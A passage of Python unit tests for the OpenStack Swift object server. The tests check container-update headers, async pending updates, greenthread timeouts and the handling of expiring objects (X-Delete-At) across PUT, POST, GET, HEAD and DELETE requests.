                'X-Container-Partition': 'cpartition',
                'X-Container-Device': 'cdevice',
                'Content-Type': 'text/plain',
            }
            headers.update(override_headers)
            req = Request.blank('/sda1/0/a/c/o', method='PUT',
                                headers=headers, body='')
            with mocked_http_conn(
                    200, give_connect=capture_updates) as fake_conn:
                with fake_spawn():
                    resp = req.get_response(self.object_controller)
            self.assertRaises(StopIteration, fake_conn.code_iter.next)
            self.assertEqual(resp.status_int, 201)
            self.assertEqual(len(container_updates), 1)
            ip, port, method, path, headers = container_updates[0]
            self.assertEqual(ip, 'chost')
            self.assertEqual(port, 'cport')
            self.assertEqual(method, 'PUT')
            self.assertEqual(path, '/cdevice/cpartition/a/c/o')
            self.assertEqual(headers, HeaderKeyDict({
                'user-agent': 'object-server %s' % os.getpid(),
                'x-size': '0',
                'x-etag': 'override_etag',
                'x-content-type': 'override_val',
                'x-timestamp': ts_put.internal,
                'X-Backend-Storage-Policy-Index': '0',  # default
                'x-trans-id': '123',
                'referer': 'PUT http://localhost/sda1/0/a/c/o',
                'x-foo': 'bar'}))

        # EC policy override headers
        do_test({
            'X-Backend-Container-Update-Override-Etag': 'override_etag',
            'X-Backend-Container-Update-Override-Content-Type': 'override_val',
            'X-Backend-Container-Update-Override-Foo': 'bar',
            'X-Backend-Container-Ignored': 'ignored'})

        # middleware override headers
        do_test({
            'X-Object-Sysmeta-Container-Update-Override-Etag': 'override_etag',
            'X-Object-Sysmeta-Container-Update-Override-Content-Type':
                'override_val',
            'X-Object-Sysmeta-Container-Update-Override-Foo': 'bar',
            'X-Object-Sysmeta-Ignored': 'ignored'})

        # middleware override headers take precedence over EC policy headers
        do_test({
            'X-Object-Sysmeta-Container-Update-Override-Etag': 'override_etag',
            'X-Object-Sysmeta-Container-Update-Override-Content-Type':
                'override_val',
            'X-Object-Sysmeta-Container-Update-Override-Foo': 'bar',
            'X-Backend-Container-Update-Override-Etag': 'ignored',
            'X-Backend-Container-Update-Override-Content-Type': 'ignored',
            'X-Backend-Container-Update-Override-Foo': 'ignored'})
    def test_container_update_async(self):
        """When the container server errors (500), the update is handed to
        the diskfile manager's pickle_async_update with the full update
        payload for the object's policy."""
        policy = random.choice(list(POLICIES))
        req = Request.blank(
            '/sda1/0/a/c/o',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': 1,
                     'X-Trans-Id': '123',
                     'X-Container-Host': 'chost:cport',
                     'X-Container-Partition': 'cpartition',
                     'X-Container-Device': 'cdevice',
                     'Content-Type': 'text/plain',
                     'X-Object-Sysmeta-Ec-Frag-Index': 0,
                     'X-Backend-Storage-Policy-Index': int(policy)}, body='')
        given_args = []

        def fake_pickle_async_update(*args):
            given_args[:] = args

        # Intercept the async-pending write on this policy's manager.
        diskfile_mgr = self.object_controller._diskfile_router[policy]
        diskfile_mgr.pickle_async_update = fake_pickle_async_update
        with mocked_http_conn(500) as fake_conn, fake_spawn():
            resp = req.get_response(self.object_controller)
        self.assertRaises(StopIteration, fake_conn.code_iter.next)
        self.assertEqual(resp.status_int, 201)
        self.assertEqual(len(given_args), 7)
        (objdevice, account, container, obj, data, timestamp,
         policy) = given_args
        self.assertEqual(objdevice, 'sda1')
        self.assertEqual(account, 'a')
        self.assertEqual(container, 'c')
        self.assertEqual(obj, 'o')
        self.assertEqual(timestamp, utils.Timestamp(1).internal)
        self.assertEqual(policy, policy)
        self.assertEqual(data, {
            'headers': HeaderKeyDict({
                'X-Size': '0',
                'User-Agent': 'object-server %s' % os.getpid(),
                'X-Content-Type': 'text/plain',
                'X-Timestamp': utils.Timestamp(1).internal,
                'X-Trans-Id': '123',
                'Referer': 'PUT http://localhost/sda1/0/a/c/o',
                'X-Backend-Storage-Policy-Index': int(policy),
                'X-Etag': 'd41d8cd98f00b204e9800998ecf8427e'}),
            'obj': 'o',
            'account': 'a',
            'container': 'c',
            'op': 'PUT'})
    def test_container_update_as_greenthread(self):
        """Container updates are spawned as greenthreads: the PUT response
        completes before async_update runs, and the update fires once the
        captured greenthreads are actually executed."""
        greenthreads = []
        saved_spawn_calls = []
        called_async_update_args = []

        def local_fake_spawn(func, *a, **kw):
            # Defer the spawn: just remember what would have been run.
            saved_spawn_calls.append((func, a, kw))
            return mock.MagicMock()

        def local_fake_async_update(*a, **kw):
            # just capture the args to see that we would have called
            called_async_update_args.append([a, kw])

        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': '12345',
                     'Content-Type': 'application/burrito',
                     'Content-Length': '0',
                     'X-Backend-Storage-Policy-Index': 0,
                     'X-Container-Partition': '20',
                     'X-Container-Host': '1.2.3.4:5',
                     'X-Container-Device': 'sdb1'})
        with mock.patch.object(object_server, 'spawn',
                               local_fake_spawn):
            with mock.patch.object(self.object_controller,
                                   'async_update',
                                   local_fake_async_update):
                resp = req.get_response(self.object_controller)
                # check the response is completed and successful
                self.assertEqual(resp.status_int, 201)
                # check that async_update hasn't been called
                self.assertFalse(len(called_async_update_args))
                # now do the work in greenthreads
                for func, a, kw in saved_spawn_calls:
                    gt = spawn(func, *a, **kw)
                    greenthreads.append(gt)
        # wait for the greenthreads to finish
        for gt in greenthreads:
            gt.wait()
        # check that the calls to async_update have happened
        headers_out = {'X-Size': '0',
                       'X-Content-Type': 'application/burrito',
                       'X-Timestamp': '0000012345.00000',
                       'X-Trans-Id': '-',
                       'Referer': 'PUT http://localhost/sda1/p/a/c/o',
                       'X-Backend-Storage-Policy-Index': '0',
                       'X-Etag': 'd41d8cd98f00b204e9800998ecf8427e'}
        expected = [('PUT', 'a', 'c', 'o', '1.2.3.4:5', '20', 'sdb1',
                     headers_out, 'sda1', POLICIES[0]),
                    {'logger_thread_locals': (None, None)}]
        self.assertEqual(called_async_update_args, [expected])
    def test_container_update_as_greenthread_with_timeout(self):
        """Give it one container to update (so only one greenthread is
        spawned), fake the greenthread so it raises a Timeout, and check
        that the right message is logged while the PUT still succeeds.
        """
        called_async_update_args = []

        def local_fake_spawn(func, *a, **kw):
            m = mock.MagicMock()

            def wait_with_error():
                raise Timeout()
            m.wait = wait_with_error  # because raise can't be in a lambda
            return m

        def local_fake_async_update(*a, **kw):
            # just capture the args to see that we would have called
            called_async_update_args.append([a, kw])

        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': '12345',
                     'Content-Type': 'application/burrito',
                     'Content-Length': '0',
                     'X-Backend-Storage-Policy-Index': 0,
                     'X-Container-Partition': '20',
                     'X-Container-Host': '1.2.3.4:5',
                     'X-Container-Device': 'sdb1'})
        with mock.patch.object(object_server, 'spawn',
                               local_fake_spawn):
            with mock.patch.object(self.object_controller,
                                   'container_update_timeout',
                                   1.414213562):
                resp = req.get_response(self.object_controller)
                # check the response is completed and successful
                self.assertEqual(resp.status_int, 201)
                # check that the timeout was logged
                expected_logged_error = "Container update timeout (1.4142s) " \
                    "waiting for [('1.2.3.4:5', 'sdb1')]"
                self.assertTrue(
                    expected_logged_error in
                    self.object_controller.logger.get_lines_for_level('debug'))
    def test_container_update_bad_args(self):
        """Mismatched X-Container-Host vs X-Container-Device counts must
        skip the update entirely and log a descriptive error."""
        policy = random.choice(list(POLICIES))
        given_args = []

        def fake_async_update(*args):
            given_args.extend(args)

        # Two hosts but only one device -- an invalid combination.
        req = Request.blank(
            '/v1/a/c/o',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': 1,
                     'X-Trans-Id': '123',
                     'X-Container-Host': 'chost,badhost',
                     'X-Container-Partition': 'cpartition',
                     'X-Container-Device': 'cdevice',
                     'X-Backend-Storage-Policy-Index': int(policy)})
        with mock.patch.object(self.object_controller, 'async_update',
                               fake_async_update):
            self.object_controller.container_update(
                'PUT', 'a', 'c', 'o', req, {
                    'x-size': '0',
                    'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
                    'x-content-type': 'text/plain', 'x-timestamp': '1'},
                'sda1', policy)
        # No update attempted; one error logged naming both header values.
        self.assertEqual(given_args, [])
        errors = self.object_controller.logger.get_lines_for_level('error')
        self.assertEqual(len(errors), 1)
        msg = errors[0]
        self.assertTrue('Container update failed' in msg)
        self.assertTrue('different numbers of hosts and devices' in msg)
        self.assertTrue('chost,badhost' in msg)
        self.assertTrue('cdevice' in msg)
def test_delete_at_update_on_put(self):
# Test how delete_at_update works when issued a delete for old
# expiration info after a new put with no new expiration info.
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '123',
'X-Backend-Storage-Policy-Index': int(policy)})
with mock.patch.object(self.object_controller, 'async_update',
fake_async_update):
self.object_controller.delete_at_update(
'DELETE', 2, 'a', 'c', 'o', req, 'sda1', policy)
self.assertEqual(
given_args, [
'DELETE', '.expiring_objects', '0000000000',
'0000000002-a/c/o', None, None, None,
HeaderKeyDict({
'X-Backend-Storage-Policy-Index': 0,
'x-timestamp': utils.Timestamp('1').internal,
'x-trans-id': '123',
'referer': 'PUT http://localhost/v1/a/c/o'}),
'sda1', policy])
    def test_delete_at_negative(self):
        # Test how delete_at_update works when issued a delete for old
        # expiration info after a new put with no new expiration info.
        # Test negative is reset to 0
        policy = random.choice(list(POLICIES))
        given_args = []

        def fake_async_update(*args):
            given_args.extend(args)

        self.object_controller.async_update = fake_async_update
        req = Request.blank(
            '/v1/a/c/o',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': 1,
                     'X-Trans-Id': '1234', 'X-Backend-Storage-Policy-Index':
                     int(policy)})
        # delete-at of -2 must be clamped up to 0 in the expirer entry.
        self.object_controller.delete_at_update(
            'DELETE', -2, 'a', 'c', 'o', req, 'sda1', policy)
        self.assertEqual(given_args, [
            'DELETE', '.expiring_objects', '0000000000', '0000000000-a/c/o',
            None, None, None,
            HeaderKeyDict({
                # the expiring objects account is always 0
                'X-Backend-Storage-Policy-Index': 0,
                'x-timestamp': utils.Timestamp('1').internal,
                'x-trans-id': '1234',
                'referer': 'PUT http://localhost/v1/a/c/o'}),
            'sda1', policy])
    def test_delete_at_cap(self):
        # Test how delete_at_update works when issued a delete for old
        # expiration info after a new put with no new expiration info.
        # Test past cap is reset to cap
        policy = random.choice(list(POLICIES))
        given_args = []

        def fake_async_update(*args):
            given_args.extend(args)

        self.object_controller.async_update = fake_async_update
        req = Request.blank(
            '/v1/a/c/o',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': 1,
                     'X-Trans-Id': '1234',
                     'X-Backend-Storage-Policy-Index': int(policy)})
        # 12345678901 has 11 digits -- past the 10-digit timestamp cap.
        self.object_controller.delete_at_update(
            'DELETE', 12345678901, 'a', 'c', 'o', req, 'sda1', policy)
        # Pull out the expirer container name and check it separately,
        # since it is computed from the (normalized) delete-at time.
        expiring_obj_container = given_args.pop(2)
        expected_exp_cont = utils.get_expirer_container(
            utils.normalize_delete_at_timestamp(12345678901),
            86400, 'a', 'c', 'o')
        self.assertEqual(expiring_obj_container, expected_exp_cont)

        # The object name in the expirer entry is capped at 9999999999.
        self.assertEqual(given_args, [
            'DELETE', '.expiring_objects', '9999999999-a/c/o',
            None, None, None,
            HeaderKeyDict({
                'X-Backend-Storage-Policy-Index': 0,
                'x-timestamp': utils.Timestamp('1').internal,
                'x-trans-id': '1234',
                'referer': 'PUT http://localhost/v1/a/c/o'}),
            'sda1', policy])
    def test_delete_at_update_put_with_info(self):
        # Keep next test,
        # test_delete_at_update_put_with_info_but_missing_container, in sync
        # with this one but just missing the X-Delete-At-Container header.
        policy = random.choice(list(POLICIES))
        given_args = []

        def fake_async_update(*args):
            given_args.extend(args)

        self.object_controller.async_update = fake_async_update
        req = Request.blank(
            '/v1/a/c/o',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': 1,
                     'X-Trans-Id': '1234',
                     'X-Delete-At-Container': '0',
                     'X-Delete-At-Host': '127.0.0.1:1234',
                     'X-Delete-At-Partition': '3',
                     'X-Delete-At-Device': 'sdc1',
                     'X-Backend-Storage-Policy-Index': int(policy)})
        self.object_controller.delete_at_update('PUT', 2, 'a', 'c', 'o',
                                                req, 'sda1', policy)
        # The expirer PUT goes to the X-Delete-At-* host/partition/device
        # with zero-size text/plain metadata and policy index 0.
        self.assertEqual(
            given_args, [
                'PUT', '.expiring_objects', '0000000000', '0000000002-a/c/o',
                '127.0.0.1:1234',
                '3', 'sdc1', HeaderKeyDict({
                    # the .expiring_objects account is always policy-0
                    'X-Backend-Storage-Policy-Index': 0,
                    'x-size': '0',
                    'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
                    'x-content-type': 'text/plain',
                    'x-timestamp': utils.Timestamp('1').internal,
                    'x-trans-id': '1234',
                    'referer': 'PUT http://localhost/v1/a/c/o'}),
                'sda1', policy])
    def test_delete_at_update_put_with_info_but_missing_container(self):
        # Same as previous test, test_delete_at_update_put_with_info, but just
        # missing the X-Delete-At-Container header.
        policy = random.choice(list(POLICIES))
        given_args = []

        def fake_async_update(*args):
            given_args.extend(args)

        self.object_controller.async_update = fake_async_update
        self.object_controller.logger = self.logger
        req = Request.blank(
            '/v1/a/c/o',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': 1,
                     'X-Trans-Id': '1234',
                     'X-Delete-At-Host': '127.0.0.1:1234',
                     'X-Delete-At-Partition': '3',
                     'X-Delete-At-Device': 'sdc1',
                     'X-Backend-Storage-Policy-Index': int(policy)})
        self.object_controller.delete_at_update('PUT', 2, 'a', 'c', 'o',
                                                req, 'sda1', policy)
        # Without X-Delete-At-Container the server guesses the container
        # name and warns about it.
        self.assertEqual(
            self.logger.get_lines_for_level('warning'),
            ['X-Delete-At-Container header must be specified for expiring '
             'objects background PUT to work properly. Making best guess as '
             'to the container name for now.'])
    def test_delete_at_update_delete(self):
        """A DELETE with delete-at info issues a DELETE to the expirer
        account's bucket container, using policy index 0."""
        policy = random.choice(list(POLICIES))
        given_args = []

        def fake_async_update(*args):
            given_args.extend(args)

        self.object_controller.async_update = fake_async_update
        req = Request.blank(
            '/v1/a/c/o',
            environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': 1,
                     'X-Trans-Id': '1234',
                     'X-Backend-Storage-Policy-Index': int(policy)})
        self.object_controller.delete_at_update('DELETE', 2, 'a', 'c', 'o',
                                                req, 'sda1', policy)
        self.assertEqual(
            given_args, [
                'DELETE', '.expiring_objects', '0000000000',
                '0000000002-a/c/o', None, None,
                None, HeaderKeyDict({
                    'X-Backend-Storage-Policy-Index': 0,
                    'x-timestamp': utils.Timestamp('1').internal,
                    'x-trans-id': '1234',
                    'referer': 'DELETE http://localhost/v1/a/c/o'}),
                'sda1', policy])
def test_delete_backend_replication(self):
# If X-Backend-Replication: True delete_at_update should completely
# short-circuit.
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234',
'X-Backend-Replication': 'True',
'X-Backend-Storage-Policy-Index': int(policy)})
self.object_controller.delete_at_update(
'DELETE', -2, 'a', 'c', 'o', req, 'sda1', policy)
self.assertEqual(given_args, [])
    def test_POST_calls_delete_at(self):
        # POST should drive the expiring-object bookkeeping: requests
        # without X-Delete-At trigger no delete_at_update call, a POST
        # setting X-Delete-At issues a 'PUT' update, and a POST changing
        # X-Delete-At issues a 'PUT' for the new expiry plus a 'DELETE'
        # cancelling the previously scheduled one.
        policy = random.choice(list(POLICIES))
        given_args = []

        def fake_delete_at_update(*args):
            given_args.extend(args)
        # Capture the arguments instead of doing the real container update.
        self.object_controller.delete_at_update = fake_delete_at_update

        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(time()),
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream',
                     'X-Backend-Storage-Policy-Index': int(policy),
                     'X-Object-Sysmeta-Ec-Frag-Index': 2})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # Initial PUT carries no X-Delete-At, so nothing is recorded.
        self.assertEqual(given_args, [])

        sleep(.00001)
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': normalize_timestamp(time()),
                     'Content-Type': 'application/x-test',
                     'X-Backend-Storage-Policy-Index': int(policy)})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        # POST without X-Delete-At still records nothing.
        self.assertEqual(given_args, [])

        sleep(.00001)
        timestamp1 = normalize_timestamp(time())
        delete_at_timestamp1 = str(int(time() + 1000))
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': timestamp1,
                     'Content-Type': 'application/x-test',
                     'X-Delete-At': delete_at_timestamp1,
                     'X-Backend-Storage-Policy-Index': int(policy)})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        # given_args[5] is the Request object passed through to the update.
        self.assertEqual(
            given_args, [
                'PUT', int(delete_at_timestamp1), 'a', 'c', 'o',
                given_args[5], 'sda1', policy])

        while given_args:
            given_args.pop()

        sleep(.00001)
        timestamp2 = normalize_timestamp(time())
        delete_at_timestamp2 = str(int(time() + 2000))
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': timestamp2,
                     'Content-Type': 'application/x-test',
                     'X-Delete-At': delete_at_timestamp2,
                     'X-Backend-Storage-Policy-Index': int(policy)})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        # Changing X-Delete-At schedules the new expiry and cancels the old.
        self.assertEqual(
            given_args, [
                'PUT', int(delete_at_timestamp2), 'a', 'c', 'o',
                given_args[5], 'sda1', policy,
                'DELETE', int(delete_at_timestamp1), 'a', 'c', 'o',
                given_args[5], 'sda1', policy])
    def test_PUT_calls_delete_at(self):
        # PUT should drive the expiring-object bookkeeping: a PUT without
        # X-Delete-At triggers no delete_at_update call, a PUT with
        # X-Delete-At records a 'PUT' update, and overwriting with a
        # different X-Delete-At records a 'PUT' for the new expiry plus a
        # 'DELETE' cancelling the old one.
        policy = random.choice(list(POLICIES))
        given_args = []

        def fake_delete_at_update(*args):
            given_args.extend(args)
        # Capture the arguments instead of doing the real container update.
        self.object_controller.delete_at_update = fake_delete_at_update

        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(time()),
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream',
                     'X-Backend-Storage-Policy-Index': int(policy),
                     'X-Object-Sysmeta-Ec-Frag-Index': 4})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # No X-Delete-At on the initial PUT, so nothing is recorded.
        self.assertEqual(given_args, [])

        sleep(.00001)
        timestamp1 = normalize_timestamp(time())
        delete_at_timestamp1 = str(int(time() + 1000))
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp1,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream',
                     'X-Delete-At': delete_at_timestamp1,
                     'X-Backend-Storage-Policy-Index': int(policy),
                     'X-Object-Sysmeta-Ec-Frag-Index': 3})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # given_args[5] is the Request object passed through to the update.
        self.assertEqual(
            given_args, [
                'PUT', int(delete_at_timestamp1), 'a', 'c', 'o',
                given_args[5], 'sda1', policy])

        while given_args:
            given_args.pop()

        sleep(.00001)
        timestamp2 = normalize_timestamp(time())
        delete_at_timestamp2 = str(int(time() + 2000))
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp2,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream',
                     'X-Delete-At': delete_at_timestamp2,
                     'X-Backend-Storage-Policy-Index': int(policy),
                     'X-Object-Sysmeta-Ec-Frag-Index': 3})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # Overwrite schedules the new expiry and cancels the old one.
        self.assertEqual(
            given_args, [
                'PUT', int(delete_at_timestamp2), 'a', 'c', 'o',
                given_args[5], 'sda1', policy,
                'DELETE', int(delete_at_timestamp1), 'a', 'c', 'o',
                given_args[5], 'sda1', policy])
    def test_GET_but_expired(self):
        # A GET before the object's X-Delete-At succeeds; once the expiry
        # time passes, the same object 404s and the response carries the
        # original put timestamp in X-Backend-Timestamp.
        test_time = time() + 10000
        delete_at_timestamp = int(test_time + 100)
        # Integer division rounds the expiry down to its expirer container.
        delete_at_container = str(
            delete_at_timestamp /
            self.object_controller.expiring_objects_container_divisor *
            self.object_controller.expiring_objects_container_divisor)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 2000),
                     'X-Delete-At': str(delete_at_timestamp),
                     'X-Delete-At-Container': delete_at_container,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)

        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
            headers={'X-Timestamp': normalize_timestamp(test_time)})
        resp = req.get_response(self.object_controller)
        # Not expired yet, so the object is served.
        self.assertEqual(resp.status_int, 200)

        orig_time = object_server.time.time
        try:
            # Freeze the server's clock just before a one-second expiry.
            t = time()
            object_server.time.time = lambda: t
            delete_at_timestamp = int(t + 1)
            delete_at_container = str(
                delete_at_timestamp /
                self.object_controller.expiring_objects_container_divisor *
                self.object_controller.expiring_objects_container_divisor)
            put_timestamp = normalize_timestamp(test_time - 1000)
            req = Request.blank(
                '/sda1/p/a/c/o',
                environ={'REQUEST_METHOD': 'PUT'},
                headers={'X-Timestamp': put_timestamp,
                         'X-Delete-At': str(delete_at_timestamp),
                         'X-Delete-At-Container': delete_at_container,
                         'Content-Length': '4',
                         'Content-Type': 'application/octet-stream'})
            req.body = 'TEST'
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 201)
            req = Request.blank(
                '/sda1/p/a/c/o',
                environ={'REQUEST_METHOD': 'GET'},
                headers={'X-Timestamp': normalize_timestamp(test_time)})
            resp = req.get_response(self.object_controller)
            # Still one second before expiry, so still readable.
            self.assertEqual(resp.status_int, 200)
        finally:
            object_server.time.time = orig_time

        orig_time = object_server.time.time
        try:
            # Advance the server's clock past the expiry.
            t = time() + 2
            object_server.time.time = lambda: t
            req = Request.blank(
                '/sda1/p/a/c/o',
                environ={'REQUEST_METHOD': 'GET'},
                headers={'X-Timestamp': normalize_timestamp(t)})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 404)
            # Expired objects still report when they were written.
            self.assertEqual(resp.headers['X-Backend-Timestamp'],
                             utils.Timestamp(put_timestamp))
        finally:
            object_server.time.time = orig_time
    def test_HEAD_but_expired(self):
        # A HEAD before the object's X-Delete-At succeeds; once the expiry
        # time passes, the same object 404s and the response carries the
        # original put timestamp in X-Backend-Timestamp.
        test_time = time() + 10000
        delete_at_timestamp = int(test_time + 100)
        # Integer division rounds the expiry down to its expirer container.
        delete_at_container = str(
            delete_at_timestamp /
            self.object_controller.expiring_objects_container_divisor *
            self.object_controller.expiring_objects_container_divisor)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 2000),
                     'X-Delete-At': str(delete_at_timestamp),
                     'X-Delete-At-Container': delete_at_container,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)

        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'HEAD'},
            headers={'X-Timestamp': normalize_timestamp(test_time)})
        resp = req.get_response(self.object_controller)
        # Not expired yet, so the HEAD succeeds.
        self.assertEqual(resp.status_int, 200)

        orig_time = object_server.time.time
        try:
            # Freeze the server's clock just before a one-second expiry.
            t = time()
            delete_at_timestamp = int(t + 1)
            delete_at_container = str(
                delete_at_timestamp /
                self.object_controller.expiring_objects_container_divisor *
                self.object_controller.expiring_objects_container_divisor)
            object_server.time.time = lambda: t
            put_timestamp = normalize_timestamp(test_time - 1000)
            req = Request.blank(
                '/sda1/p/a/c/o',
                environ={'REQUEST_METHOD': 'PUT'},
                headers={'X-Timestamp': put_timestamp,
                         'X-Delete-At': str(delete_at_timestamp),
                         'X-Delete-At-Container': delete_at_container,
                         'Content-Length': '4',
                         'Content-Type': 'application/octet-stream'})
            req.body = 'TEST'
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 201)
            req = Request.blank(
                '/sda1/p/a/c/o',
                environ={'REQUEST_METHOD': 'HEAD'},
                headers={'X-Timestamp': normalize_timestamp(test_time)})
            resp = req.get_response(self.object_controller)
            # Still one second before expiry, so still visible.
            self.assertEqual(resp.status_int, 200)
        finally:
            object_server.time.time = orig_time

        orig_time = object_server.time.time
        try:
            # Advance the server's clock past the expiry.
            t = time() + 2
            object_server.time.time = lambda: t
            req = Request.blank(
                '/sda1/p/a/c/o',
                environ={'REQUEST_METHOD': 'HEAD'},
                headers={'X-Timestamp': normalize_timestamp(time())})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 404)
            # Expired objects still report when they were written.
            self.assertEqual(resp.headers['X-Backend-Timestamp'],
                             utils.Timestamp(put_timestamp))
        finally:
            object_server.time.time = orig_time
    def test_POST_but_expired(self):
        # POST to a live expiring object succeeds (202); POST after the
        # object's X-Delete-At has passed returns 404.
        test_time = time() + 10000
        delete_at_timestamp = int(test_time + 100)
        # Integer division rounds the expiry down to its expirer container.
        delete_at_container = str(
            delete_at_timestamp /
            self.object_controller.expiring_objects_container_divisor *
            self.object_controller.expiring_objects_container_divisor)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 2000),
                     'X-Delete-At': str(delete_at_timestamp),
                     'X-Delete-At-Container': delete_at_container,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)

        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 1500)})
        resp = req.get_response(self.object_controller)
        # Not expired yet, so the POST is accepted.
        self.assertEqual(resp.status_int, 202)

        # Re-PUT the object with an expiry only one second away.
        delete_at_timestamp = int(time() + 1)
        delete_at_container = str(
            delete_at_timestamp /
            self.object_controller.expiring_objects_container_divisor *
            self.object_controller.expiring_objects_container_divisor)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 1000),
                     'X-Delete-At': str(delete_at_timestamp),
                     'X-Delete-At-Container': delete_at_container,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)

        orig_time = object_server.time.time
        try:
            # Advance the server's clock past the expiry.
            t = time() + 2
            object_server.time.time = lambda: t
            req = Request.blank(
                '/sda1/p/a/c/o',
                environ={'REQUEST_METHOD': 'POST'},
                headers={'X-Timestamp': normalize_timestamp(time())})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 404)
        finally:
            object_server.time.time = orig_time
    def test_DELETE_but_expired(self):
        # DELETE of an object whose X-Delete-At has already passed 404s.
        test_time = time() + 10000
        delete_at_timestamp = int(test_time + 100)
        # Integer division rounds the expiry down to its expirer container.
        delete_at_container = str(
            delete_at_timestamp /
            self.object_controller.expiring_objects_container_divisor *
            self.object_controller.expiring_objects_container_divisor)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 2000),
                     'X-Delete-At': str(delete_at_timestamp),
                     'X-Delete-At-Container': delete_at_container,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)

        orig_time = object_server.time.time
        try:
            # Advance the server's clock well past the expiry.
            t = test_time + 100
            object_server.time.time = lambda: float(t)
            req = Request.blank(
                '/sda1/p/a/c/o',
                environ={'REQUEST_METHOD': 'DELETE'},
                headers={'X-Timestamp': normalize_timestamp(time())})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 404)
        finally:
            object_server.time.time = orig_time
    def test_DELETE_if_delete_at_expired_still_deletes(self):
        # Even after the object has expired (GET 404s but the .data file
        # remains on disk), a DELETE with a matching X-If-Delete-At must
        # still remove the file; a mismatched value 412s and leaves it.
        test_time = time() + 10
        test_timestamp = normalize_timestamp(test_time)
        delete_at_time = int(test_time + 10)
        delete_at_timestamp = str(delete_at_time)
        # Integer division rounds the expiry down to its expirer container.
        delete_at_container = str(
            delete_at_time /
